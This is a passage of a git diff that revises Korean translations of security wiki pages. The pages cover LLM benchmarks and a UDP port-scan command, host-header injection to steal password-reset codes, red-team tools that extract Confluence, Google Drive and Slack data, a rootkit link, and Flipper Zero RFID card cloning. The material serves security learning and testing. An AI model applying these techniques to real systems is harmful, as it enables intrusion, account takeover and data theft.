+1. **대규모 다중 작업 언어 이해(**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU는 인문학, 과학 등 57개 주제에 걸쳐 모델의 지식과 문제 해결 능력을 평가합니다. 다양한 난이도에서 이해도를 평가하기 위해 객관식 질문을 사용합니다.
 2. [**LMSYS 챗봇 아레나**](https://arena.lmsys.org): 이 플랫폼은 사용자가 다양한 챗봇의 응답을 나란히 비교할 수 있도록 합니다. 사용자가 프롬프트를 입력하면 여러 챗봇이 응답을 생성하여 직접 비교할 수 있습니다.
 3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval은 고급 LLM인 GPT-4가 다양한 프롬프트에 대한 다른 모델의 응답을 평가하는 자동화된 평가 프레임워크입니다.
-4. **일반 언어 이해 평가 (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE는 감정 분석, 텍스트 함의, 질문 응답 등을 포함한 아홉 가지 자연어 이해 작업의 모음입니다.
+4. **일반 언어 이해 평가(**[**GLUE**](https://gluebenchmark.com/)**):** GLUE는 감정 분석, 텍스트 함의 및 질문 응답을 포함한 아홉 가지 자연어 이해 작업의 모음입니다.
 5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** GLUE를 기반으로 하여 SuperGLUE는 현재 모델에 대해 어려운 작업을 포함합니다.
-6. **모방 게임 벤치마크 초월 (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench는 추론, 번역 및 질문 응답과 같은 영역에서 모델의 능력을 테스트하는 200개 이상의 작업을 포함하는 대규모 벤치마크입니다.
-7. **언어 모델의 전체 평가 (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM은 정확성, 강건성 및 공정성과 같은 다양한 메트릭에 걸쳐 포괄적인 평가를 제공합니다.
+6. **모방 게임 벤치마크 초과(**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench는 추론, 번역 및 질문 응답과 같은 영역에서 모델의 능력을 테스트하는 200개 이상의 작업을 포함하는 대규모 벤치마크입니다.
+7. **언어 모델의 전체 평가(**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM은 정확성, 강건성 및 공정성과 같은 다양한 메트릭에 걸쳐 포괄적인 평가를 제공합니다.
 8. [**OpenAI Evals**](https://github.com/openai/evals)**:** OpenAI에서 제공하는 오픈 소스 평가 프레임워크로, 사용자 정의 및 표준화된 작업에서 AI 모델을 테스트할 수 있습니다.
 9. [**HumanEval**](https://github.com/openai/human-eval)**:** 언어 모델의 코드 생성 능력을 평가하는 데 사용되는 프로그래밍 문제 모음입니다.
-10. **스탠포드 질문 응답 데이터셋 (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD는 모델이 정확하게 답변하기 위해 텍스트를 이해해야 하는 위키피디아 기사에 대한 질문으로 구성됩니다.
-11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** 퀴즈 질문과 답변, 증거 문서의 대규모 데이터셋입니다.
+10. **스탠포드 질문 응답 데이터셋(**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD는 모델이 정확하게 답변하기 위해 텍스트를 이해해야 하는 위키피디아 기사에 대한 질문으로 구성됩니다.
+11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** 퀴즈 질문과 답변의 대규모 데이터셋과 증거 문서입니다.
 
 그리고 많은 많은 더 있습니다.
 
diff --git a/src/todo/llm-training-data-preparation/README.md b/src/todo/llm-training-data-preparation/README.md
index c662c277a..b1146ab2d 100644
--- a/src/todo/llm-training-data-preparation/README.md
+++ b/src/todo/llm-training-data-preparation/README.md
@@ -22,7 +22,7 @@
 ## 2. Data Sampling
 
 > [!TIP]
-> 이 두 번째 단계의 목표는 매우 간단합니다: **입력 데이터를 샘플링하고 훈련 단계에 맞게 준비하는 것입니다. 일반적으로 특정 길이의 문장으로 데이터셋을 분리하고 예상 응답도 생성합니다.**
+> 이 두 번째 단계의 목표는 매우 간단합니다: **입력 데이터를 샘플링하고 훈련 단계에 맞게 준비하는 것입니다. 일반적으로 데이터셋을 특정 길이의 문장으로 나누고 예상 응답도 생성합니다.**
 
 {{#ref}}
 2.-data-sampling.md
@@ -32,7 +32,7 @@
 
 > [!TIP]
 > 이 세 번째 단계의 목표는 매우 간단합니다: **어휘의 각 이전 토큰에 원하는 차원의 벡터를 할당하여 모델을 훈련하는 것입니다.** 어휘의 각 단어는 X 차원의 공간에서 한 점이 됩니다.\
-> 처음에 각 단어의 위치는 "무작위로" 초기화되며, 이러한 위치는 훈련 가능한 매개변수입니다(훈련 중 개선됩니다).
+> 처음에는 각 단어의 위치가 "무작위로" 초기화되며, 이러한 위치는 훈련 가능한 매개변수입니다(훈련 중 개선됩니다).
 >
 > 게다가, 토큰 임베딩 동안 **또 다른 임베딩 레이어가 생성됩니다**. 이는 (이 경우) **훈련 문장에서 단어의 절대 위치를 나타냅니다**. 이렇게 하면 문장에서 서로 다른 위치에 있는 단어는 서로 다른 표현(의미)을 갖게 됩니다.
 
@@ -64,7 +64,7 @@
 ## 6. Pre-training & Loading models
 
 > [!TIP]
-> 이 여섯 번째 단계의 목표는 매우 간단합니다: **모델을 처음부터 훈련하는 것입니다**. 이를 위해 이전 LLM 아키텍처를 사용하여 정의된 손실 함수와 최적화를 사용하여 데이터 세트를 반복하며 모델의 모든 매개변수를 훈련합니다.
+> 이 여섯 번째 단계의 목표는 매우 간단합니다: **모델을 처음부터 훈련하는 것입니다**. 이를 위해 이전 LLM 아키텍처를 사용하여 정의된 손실 함수와 최적화를 사용하여 데이터 세트를 반복하는 루프를 통해 모델의 모든 매개변수를 훈련합니다.
 
 {{#ref}}
 6.-pre-training-and-loading-models.md
diff --git a/src/todo/misc.md b/src/todo/misc.md
index c3fdb565f..05a5686ee 100644
--- a/src/todo/misc.md
+++ b/src/todo/misc.md
@@ -16,8 +16,8 @@ $6$- sha512
 nc -nv -u -z -w 1 \<IP> 160-16
 
 특정 포트로 빈 UDP 패킷이 전송됩니다. UDP 포트가 열려 있으면, 대상 머신에서 응답이 전송되지 않습니다. UDP 포트가 닫혀 있으면, 대상 머신에서 ICMP 포트 도달 불가 패킷이 전송되어야 합니다.\
-UDP 포트 스캔은 종종 신뢰할 수 없으며, 방화벽과 라우터가 ICMP 패킷을 차단할 수 있습니다. 이는 스캔에서 잘못된 긍정 결과를 초래할 수 있으며, 스캔된 머신에서 모든 UDP 포트가 열려 있는 것으로 표시되는 UDP 포트 스캔을 자주 볼 수 있습니다.\
-대부분의 포트 스캐너는 모든 사용 가능한 포트를 스캔하지 않으며, 일반적으로 스캔되는 "흥미로운 포트"의 미리 설정된 목록을 가지고 있습니다.
+UDP 포트 스캔은 종종 신뢰할 수 없으며, 방화벽과 라우터가 ICMP 패킷을 차단할 수 있습니다. 이는 스캔에서 잘못된 긍정 결과를 초래할 수 있으며, 스캔된 머신에서 모든 UDP 포트가 열려 있는 것으로 표시되는 경우가 자주 있습니다.\
+대부분의 포트 스캐너는 사용 가능한 모든 포트를 스캔하지 않으며, 일반적으로 스캔할 "흥미로운 포트"의 미리 설정된 목록을 가지고 있습니다.
 
 # CTF - 트릭
 
@@ -49,6 +49,6 @@ Snow --> 메시지를 공백과 탭을 사용하여 숨기기
 
 # Characters
 
-%E2%80%AE => RTL 문자 (페이로드를 거꾸로 씀)
+%E2%80%AE => RTL Character (writes payloads backwards)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/todo/more-tools.md b/src/todo/more-tools.md
index 4f9b7bbb9..e086a618b 100644
--- a/src/todo/more-tools.md
+++ b/src/todo/more-tools.md
@@ -50,7 +50,7 @@
 - [https://github.com/izo30/google-dorker](https://github.com/izo30/google-dorker) : Google dorks
 - [https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md](https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md) : 웹 BugBounty 체크리스트
 - [https://github.com/Naategh/dom-red](https://github.com/Naategh/dom-red) : Open Redirection에 대한 도메인 목록 확인
-- [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Burp 플러그인, 오프라인 분석으로 도메인, 서브도메인 및 IP 발견
+- [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Burp 플러그인, 오프라인 분석을 통해 도메인, 서브도메인 및 IP 발견
 - [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons): 다양한 도구 목록
 - [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : 취약점 찾기 위한 BurpSuite 플러그인 (SQLi, XSS, SSTI)
 - [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) : post-messages 기능 추적을 위한 Chrome 확장
@@ -86,7 +86,7 @@ Post-crema:
 - [https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html](https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html)
 - [https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html](https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html)
 
-온라인에서 펌웨어를 찾지 못할 경우 추출하는 방법: [https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
+온라인에서 펌웨어를 찾을 수 없을 경우 펌웨어를 추출하는 방법: [https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
 
 여기 분석할 수 있는 취약점이 있는 펌웨어: [https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
 
@@ -108,7 +108,7 @@ Post-crema:
 - IP 회전 서비스: [https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212](https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212)
 - Linux 루트킷: [https://github.com/aesophor/satanic-rootkit](https://github.com/aesophor/satanic-rootkit)
 - [https://theia-ide.org/](https://theia-ide.org) : 온라인 IDE
-- [https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/) : BugBounties 시작을 위한 자료
+- [https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/) : BugBounties 시작을 위한 리소스
 - [https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab](https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab) : IOS 펜테스팅 도구
 - [https://github.com/random-robbie/keywords/blob/master/keywords.txt](https://github.com/random-robbie/keywords/blob/master/keywords.txt) : 키워드
 - [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomePWN) : IoT 해킹 (Wifi, BLE, SSDP, MDNS)
diff --git a/src/todo/online-platforms-with-api.md b/src/todo/online-platforms-with-api.md
index ee2e092ed..9fd054adb 100644
--- a/src/todo/online-platforms-with-api.md
+++ b/src/todo/online-platforms-with-api.md
@@ -28,21 +28,21 @@ IP 및 도메인과 관련된 악의적인 활동을 찾습니다. 무료입니
 
 ## [BuiltWith](https://builtwith.com/)
 
-웹에서 사용되는 기술들. 비쌉니다...\
+웹에서 사용되는 기술. 비쌉니다...\
 상업적?
 
 ## [Fraudguard](https://fraudguard.io/)
 
-호스트(도메인 또는 IP)가 의심스러운/악의적인 활동과 관련이 있는지 확인합니다. 일부 무료 API 접근이 있습니다.\
+호스트(도메인 또는 IP)가 의심스러운/악의적인 활동과 관련이 있는지 확인합니다. 일부 무료 API 접근이 가능합니다.\
 상업적?
 
 ## [FortiGuard](https://fortiguard.com/)
 
-호스트(도메인 또는 IP)가 의심스러운/악의적인 활동과 관련이 있는지 확인합니다. 일부 무료 API 접근이 있습니다.
+호스트(도메인 또는 IP)가 의심스러운/악의적인 활동과 관련이 있는지 확인합니다. 일부 무료 API 접근이 가능합니다.
 
 ## [SpamCop](https://www.spamcop.net/)
 
-호스트가 스팸 활동과 관련이 있는지 나타냅니다. 일부 무료 API 접근이 있습니다.
+호스트가 스팸 활동과 관련이 있는지 나타냅니다. 일부 무료 API 접근이 가능합니다.
 
 ## [mywot](https://www.mywot.com/)
 
@@ -55,7 +55,7 @@ IP 주소에서 기본 정보를 얻습니다. 월 최대 100K까지 테스트
 ## [securitytrails](https://securitytrails.com/app/account)
 
 이 플랫폼은 IP 내의 도메인 또는 도메인 서버 내의 도메인, 이메일에 의해 소유된 도메인(관련 도메인 찾기), 도메인의 IP 기록(CloudFlare 뒤의 호스트 찾기), 모든 도메인이 사용하는 네임서버에 대한 정보를 제공합니다....\
-일부 무료 접근이 있습니다.
+일부 무료 접근이 가능합니다.
 
 ## [fullcontact](https://www.fullcontact.com/)
 
@@ -67,7 +67,7 @@ IP 주소에서 기본 정보를 얻습니다. 월 최대 100K까지 테스트
 
 ## [\_IntelligenceX](https://intelx.io/)
 
-도메인, IP 및 이메일을 검색하고 덤프에서 정보를 얻습니다. 일부 무료 접근이 있습니다.
+도메인, IP 및 이메일을 검색하고 덤프에서 정보를 얻습니다. 일부 무료 접근이 가능합니다.
 
 ## [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/)
 
@@ -75,11 +75,11 @@ IP로 검색하고 의심스러운 활동과 관련된 정보를 수집합니다
 
 ## [Greynoise](https://viz.greynoise.io/)
 
-IP 또는 IP 범위로 검색하고 인터넷을 스캔하는 IP에 대한 정보를 얻습니다. 15일 무료 접근이 있습니다.
+IP 또는 IP 범위로 검색하고 인터넷을 스캔하는 IP에 대한 정보를 얻습니다. 15일 무료 접근이 가능합니다.
 
 ## [Shodan](https://www.shodan.io/)
 
-IP 주소의 스캔 정보를 얻습니다. 일부 무료 API 접근이 있습니다.
+IP 주소의 스캔 정보를 얻습니다. 일부 무료 API 접근이 가능합니다.
 
 ## [Censys](https://censys.io/)
 
diff --git a/src/todo/other-web-tricks.md b/src/todo/other-web-tricks.md
index 2b88489a6..3ab05b830 100644
--- a/src/todo/other-web-tricks.md
+++ b/src/todo/other-web-tricks.md
@@ -4,15 +4,15 @@
 
 ### 호스트 헤더
 
-여러 번 백엔드는 **호스트 헤더**를 신뢰하여 일부 작업을 수행합니다. 예를 들어, 비밀번호 재설정을 위한 **도메인으로 그 값을 사용할 수 있습니다**. 따라서 비밀번호를 재설정하는 링크가 포함된 이메일을 받으면, 사용되는 도메인은 호스트 헤더에 입력한 도메인입니다. 그러면 다른 사용자의 비밀번호 재설정을 요청하고 도메인을 당신이 제어하는 것으로 변경하여 그들의 비밀번호 재설정 코드를 훔칠 수 있습니다. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
+여러 번 백엔드는 **호스트 헤더**를 신뢰하여 일부 작업을 수행합니다. 예를 들어, 비밀번호 재설정을 위한 **도메인으로 그 값을 사용할 수 있습니다**. 따라서 비밀번호를 재설정하는 링크가 포함된 이메일을 받으면, 사용되는 도메인은 호스트 헤더에 입력한 것입니다. 그러면 다른 사용자의 비밀번호 재설정을 요청하고 도메인을 당신이 제어하는 것으로 변경하여 그들의 비밀번호 재설정 코드를 훔칠 수 있습니다. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
 
 > [!WARNING]
-> 사용자가 비밀번호 재설정 링크를 클릭할 때까지 기다릴 필요가 없을 수도 있다는 점에 유의하세요. **스팸 필터나 다른 중개 장치/봇이 이를 클릭하여 분석할 수 있습니다**.
+> 사용자가 비밀번호 재설정 링크를 클릭할 때까지 기다릴 필요가 없을 수도 있다는 점에 유의하세요. **스팸 필터나 다른 중개 장치/봇이 이를 클릭하여 분석할 수도 있습니다**.
 
 ### 세션 불리언
 
 때때로 일부 검증을 올바르게 완료하면 백엔드는 **세션의 보안 속성에 "True" 값을 가진 불리언을 추가합니다**. 그런 다음, 다른 엔드포인트는 해당 검사를 성공적으로 통과했는지 알 수 있습니다.\
-그러나 **검사를 통과**하고 세션이 보안 속성에서 "True" 값을 부여받으면, **접근 권한이 없어야 하는 다른 리소스에 접근을 시도할 수 있습니다**. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
+그러나 **검사를 통과**하고 세션이 보안 속성에서 "True" 값을 부여받으면, **접근 권한이 없어야 하는 다른 리소스에 접근**을 시도할 수 있습니다. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
 
 ### 등록 기능
 
diff --git a/src/todo/post-exploitation.md b/src/todo/post-exploitation.md
index cf3f8868e..1b06269a0 100644
--- a/src/todo/post-exploitation.md
+++ b/src/todo/post-exploitation.md
@@ -8,9 +8,9 @@
 ## **외부 서비스**
 
 - [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): 이 모듈은 액세스 토큰을 사용하여 Confluence의 API에 연결하고, PDF로 내보내며, 대상이 접근할 수 있는 Confluence 문서를 다운로드합니다.
-- [**GD-Thief**](https://github.com/antman1p/GD-Thief): 공격자가 접근할 수 있는 대상의 Google Drive에서 파일을 추출하기 위한 Red Team 도구로, Google Drive API를 통해 작동합니다. 여기에는 모든 공유 파일, 공유 드라이브의 모든 파일, 대상이 접근할 수 있는 도메인 드라이브의 모든 파일이 포함됩니다.
+- [**GD-Thief**](https://github.com/antman1p/GD-Thief): 공격자가 접근할 수 있는 대상의 Google Drive에서 파일을 추출하기 위한 Red Team 도구로, Google Drive API를 통해 수행됩니다. 여기에는 모든 공유 파일, 공유 드라이브의 모든 파일, 대상이 접근할 수 있는 도메인 드라이브의 모든 파일이 포함됩니다.
 - [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Google의 People API를 통해 접근할 수 있는 대상 조직의 Google People Directory를 추출하기 위한 Red Team 도구입니다.
-- [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** 이 도구는 액세스 토큰을 사용하여 Slack 작업 공간에서 '흥미로운' 정보를 추출하기 위해 네이티브 Slack API를 사용하는 Python으로 개발된 도구입니다.
+- [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** 이 도구는 액세스 토큰을 사용하여 Slack 작업 공간에서 '흥미로운' 정보를 추출하기 위해 네이티브 Slack API를 사용하는 Python으로 개발되었습니다.
 - [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound는 Red Team과 Blue Team이 Slack 작업 공간/조직을 신속하게 정찰할 수 있도록 하는 명령줄 도구입니다. Slackhound는 조직의 사용자, 파일, 메시지 등을 신속하게 검색할 수 있도록 하며, 대형 객체는 오프라인 검토를 위해 CSV로 기록됩니다.
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/todo/radio-hacking/fissure-the-rf-framework.md b/src/todo/radio-hacking/fissure-the-rf-framework.md
index 53ba622a3..271a0dc9e 100644
--- a/src/todo/radio-hacking/fissure-the-rf-framework.md
+++ b/src/todo/radio-hacking/fissure-the-rf-framework.md
@@ -2,19 +2,19 @@
 
 **주파수 독립 SDR 기반 신호 이해 및 역공학**
 
-FISSURE는 신호 감지 및 분류, 프로토콜 발견, 공격 실행, IQ 조작, 취약성 분석, 자동화 및 AI/ML을 위한 훅을 갖춘 모든 기술 수준을 위한 오픈 소스 RF 및 역공학 프레임워크입니다. 이 프레임워크는 소프트웨어 모듈, 라디오, 프로토콜, 신호 데이터, 스크립트, 흐름 그래프, 참조 자료 및 타사 도구의 신속한 통합을 촉진하기 위해 구축되었습니다. FISSURE는 소프트웨어를 한 곳에 유지하고 팀이 특정 Linux 배포판에 대한 동일한 검증된 기본 구성을 공유하면서 쉽게 작업을 시작할 수 있도록 하는 워크플로우 지원 도구입니다.
+FISSURE는 신호 감지 및 분류, 프로토콜 발견, 공격 실행, IQ 조작, 취약성 분석, 자동화 및 AI/ML을 위한 훅이 있는 모든 기술 수준을 위한 오픈 소스 RF 및 역공학 프레임워크입니다. 이 프레임워크는 소프트웨어 모듈, 라디오, 프로토콜, 신호 데이터, 스크립트, 흐름 그래프, 참조 자료 및 타사 도구의 신속한 통합을 촉진하기 위해 구축되었습니다. FISSURE는 소프트웨어를 한 위치에 유지하고 팀이 특정 Linux 배포판에 대한 동일한 검증된 기본 구성을 공유하면서 쉽게 속도를 낼 수 있도록 하는 워크플로우 지원 도구입니다.
 
-FISSURE에 포함된 프레임워크와 도구는 RF 에너지의 존재를 감지하고, 신호의 특성을 이해하며, 샘플을 수집하고 분석하고, 전송 및/또는 주입 기술을 개발하고, 사용자 정의 페이로드 또는 메시지를 제작하도록 설계되었습니다. FISSURE는 식별, 패킷 제작 및 퍼징을 지원하기 위해 프로토콜 및 신호 정보의 증가하는 라이브러리를 포함하고 있습니다. 신호 파일을 다운로드하고 트래픽을 시뮬레이션하고 시스템을 테스트하기 위한 재생 목록을 구축할 수 있는 온라인 아카이브 기능이 있습니다.
+FISSURE에 포함된 프레임워크와 도구는 RF 에너지의 존재를 감지하고, 신호의 특성을 이해하고, 샘플을 수집 및 분석하고, 전송 및/또는 주입 기술을 개발하며, 사용자 정의 페이로드 또는 메시지를 제작하도록 설계되었습니다. FISSURE는 식별, 패킷 제작 및 퍼징을 지원하기 위해 프로토콜 및 신호 정보의 증가하는 라이브러리를 포함하고 있습니다. 신호 파일을 다운로드하고 트래픽을 시뮬레이션하고 시스템을 테스트하기 위한 재생 목록을 구축할 수 있는 온라인 아카이브 기능이 있습니다.
 
-친숙한 Python 코드베이스와 사용자 인터페이스는 초보자가 RF 및 역공학과 관련된 인기 있는 도구와 기술에 대해 빠르게 배울 수 있도록 합니다. 사이버 보안 및 공학 교육자는 내장된 자료를 활용하거나 프레임워크를 사용하여 자신의 실제 응용 프로그램을 시연할 수 있습니다. 개발자와 연구자는 FISSURE를 일상 작업에 사용하거나 최첨단 솔루션을 더 넓은 청중에게 노출할 수 있습니다. FISSURE에 대한 인식과 사용이 커짐에 따라 그 기능의 범위와 포함하는 기술의 폭도 확장될 것입니다.
+친숙한 Python 코드베이스와 사용자 인터페이스는 초보자가 RF 및 역공학과 관련된 인기 있는 도구와 기술에 대해 빠르게 배울 수 있도록 합니다. 사이버 보안 및 공학 교육자는 내장된 자료를 활용하거나 프레임워크를 사용하여 자신의 실제 응용 프로그램을 시연할 수 있습니다. 개발자와 연구자는 FISSURE를 일상 업무에 사용하거나 최첨단 솔루션을 더 넓은 청중에게 노출할 수 있습니다. FISSURE에 대한 인식과 사용이 커짐에 따라 그 기능의 범위와 포함하는 기술의 폭도 확장될 것입니다.
 
 **추가 정보**
 
-* [AIS Page](https://www.ainfosec.com/technologies/fissure/)
-* [GRCon22 Slides](https://events.gnuradio.org/event/18/contributions/246/attachments/84/164/FISSURE\_Poore\_GRCon22.pdf)
-* [GRCon22 Paper](https://events.gnuradio.org/event/18/contributions/246/attachments/84/167/FISSURE\_Paper\_Poore\_GRCon22.pdf)
-* [GRCon22 Video](https://www.youtube.com/watch?v=1f2umEKhJvE)
-* [Hack Chat Transcript](https://hackaday.io/event/187076-rf-hacking-hack-chat/log/212136-hack-chat-transcript-part-1)
+* [AIS 페이지](https://www.ainfosec.com/technologies/fissure/)
+* [GRCon22 슬라이드](https://events.gnuradio.org/event/18/contributions/246/attachments/84/164/FISSURE\_Poore\_GRCon22.pdf)
+* [GRCon22 논문](https://events.gnuradio.org/event/18/contributions/246/attachments/84/167/FISSURE\_Paper\_Poore\_GRCon22.pdf)
+* [GRCon22 비디오](https://www.youtube.com/watch?v=1f2umEKhJvE)
+* [해킹 채팅 전사](https://hackaday.io/event/187076-rf-hacking-hack-chat/log/212136-hack-chat-transcript-part-1)
 
 ## 시작하기
 
@@ -40,7 +40,7 @@ FISSURE에는 파일 탐색을 쉽게 하고 코드 중복을 줄이기 위해 
 | DragonOS Focal (x86\_64) |  Python3\_maint-3.8 |
 |    Ubuntu 22.04 (x64)    | Python3\_maint-3.10 |
 
-참고: 특정 소프트웨어 도구는 모든 OS에서 작동하지 않습니다. [Software And Conflicts](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Help/Markdown/SoftwareAndConflicts.md)를 참조하십시오.
+참고: 특정 소프트웨어 도구는 모든 OS에서 작동하지 않습니다. [소프트웨어 및 충돌](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Help/Markdown/SoftwareAndConflicts.md)을 참조하십시오.
 
 **설치**
 ```
@@ -52,13 +52,13 @@ git submodule update --init
 ```
 이것은 설치 GUI를 시작하는 데 필요한 PyQt 소프트웨어 종속성을 설치합니다. 종속성이 발견되지 않으면 설치가 진행되지 않습니다.
 
-다음으로, 운영 체제에 가장 적합한 옵션을 선택하십시오 (운영 체제가 옵션과 일치하면 자동으로 감지되어야 합니다).
+다음으로, 운영 체제에 가장 적합한 옵션을 선택하십시오(운영 체제가 옵션과 일치하면 자동으로 감지되어야 합니다).
 
 |                                          Python2\_maint-3.7                                          |                                          Python3\_maint-3.8                                          |                                          Python3\_maint-3.10                                         |
 | :--------------------------------------------------------------------------------------------------: | :--------------------------------------------------------------------------------------------------: | :--------------------------------------------------------------------------------------------------: |
 | ![install1b](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/install1b.png) | ![install1a](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/install1a.png) | ![install1c](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/install1c.png) |
 
-기존의 충돌을 피하기 위해 깨끗한 운영 체제에 FISSURE를 설치하는 것이 좋습니다. FISSURE 내의 다양한 도구를 운영하는 동안 오류를 피하기 위해 모든 권장 체크박스를 선택하십시오 (기본 버튼). 설치 과정에서 여러 번의 프롬프트가 표시되며, 대부분은 상승된 권한과 사용자 이름을 요청합니다. 항목 끝에 "Verify" 섹션이 포함된 경우, 설치 관리자는 그 뒤에 오는 명령을 실행하고 명령에 의해 오류가 발생하는지에 따라 체크박스 항목을 초록색 또는 빨간색으로 강조 표시합니다. "Verify" 섹션이 없는 체크된 항목은 설치 후 검은색으로 유지됩니다.
+기존의 충돌을 피하기 위해 깨끗한 운영 체제에 FISSURE를 설치하는 것이 권장됩니다. FISSURE 내의 다양한 도구를 운영하는 동안 오류를 피하기 위해 모든 권장 체크박스를 선택하십시오(기본 버튼). 설치 과정에서 여러 번의 프롬프트가 표시되며, 대부분은 상승된 권한과 사용자 이름을 요청합니다. 항목 끝에 "Verify" 섹션이 포함된 경우, 설치 관리자는 그 뒤에 오는 명령을 실행하고 명령에 의해 오류가 발생하는지에 따라 체크박스 항목을 초록색 또는 빨간색으로 강조 표시합니다. "Verify" 섹션이 없는 체크된 항목은 설치 후 검은색으로 유지됩니다.
 
 ![install2](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Icons/README/install2.png)
 
@@ -76,7 +76,7 @@ FISSURE 사용에 대한 자세한 내용은 도움말 메뉴를 참조하십시
 
 * 대시보드
 * 중앙 허브 (HIPRFISR)
-* 대상 신호 식별 (TSI)
+* 목표 신호 식별 (TSI)
 * 프로토콜 발견 (PD)
 * 흐름 그래프 및 스크립트 실행기 (FGE)
 
diff --git a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
index c997a8073..105622858 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
@@ -2,7 +2,6 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-
 ## Intro
 
 125kHz 태그가 작동하는 방식에 대한 자세한 정보는 다음을 확인하세요:
@@ -17,14 +16,14 @@
 
 ### Read
 
-카드 정보를 **읽으려고** 시도합니다. 그런 다음 이를 **에뮬레이트**할 수 있습니다.
+카드 정보를 **읽으려** 시도합니다. 그런 다음 이를 **에뮬레이트**할 수 있습니다.
 
 > [!WARNING]
 > 일부 인터콤은 읽기 전에 쓰기 명령을 보내어 키 복제를 방지하려고 합니다. 쓰기가 성공하면 해당 태그는 가짜로 간주됩니다. Flipper가 RFID를 에뮬레이트할 때 리더가 원본과 구별할 방법이 없으므로 이러한 문제는 발생하지 않습니다.
 
 ### Add Manually
 
-Flipper Zero에서 **수동으로 데이터를 입력하여 가짜 카드를 생성**할 수 있으며, 그런 다음 이를 에뮬레이트할 수 있습니다.
+Flipper Zero에서 **수동으로 데이터를 입력하여 가짜 카드를 생성**한 다음 이를 에뮬레이트할 수 있습니다.
 
 #### IDs on cards
 
@@ -33,7 +32,7 @@ Flipper Zero에서 **수동으로 데이터를 입력하여 가짜 카드를 생
 - **EM Marin**
 
 예를 들어 이 EM-Marin 카드에서는 물리적 카드에서 **마지막 3개의 5바이트를 명확하게 읽을 수 있습니다**.\
-나머지 2개는 카드를 읽을 수 없는 경우 무차별 대입으로 찾을 수 있습니다.
+나머지 2개는 카드를 통해 읽을 수 없는 경우 무차별 대입으로 찾을 수 있습니다.
 
 <figure><img src="../../../images/image (104).png" alt=""><figcaption></figcaption></figure>
 
@@ -45,11 +44,10 @@ Flipper Zero에서 **수동으로 데이터를 입력하여 가짜 카드를 생
 
 ### Emulate/Write
 
-카드를 **복사**하거나 ID를 **수동으로 입력한** 후 Flipper Zero로 이를 **에뮬레이트**하거나 실제 카드에 **쓰기**할 수 있습니다.
+카드를 **복사**하거나 ID를 **수동으로 입력**한 후 Flipper Zero로 이를 **에뮬레이트**하거나 실제 카드에 **쓰기**할 수 있습니다.
 
 ## References
 
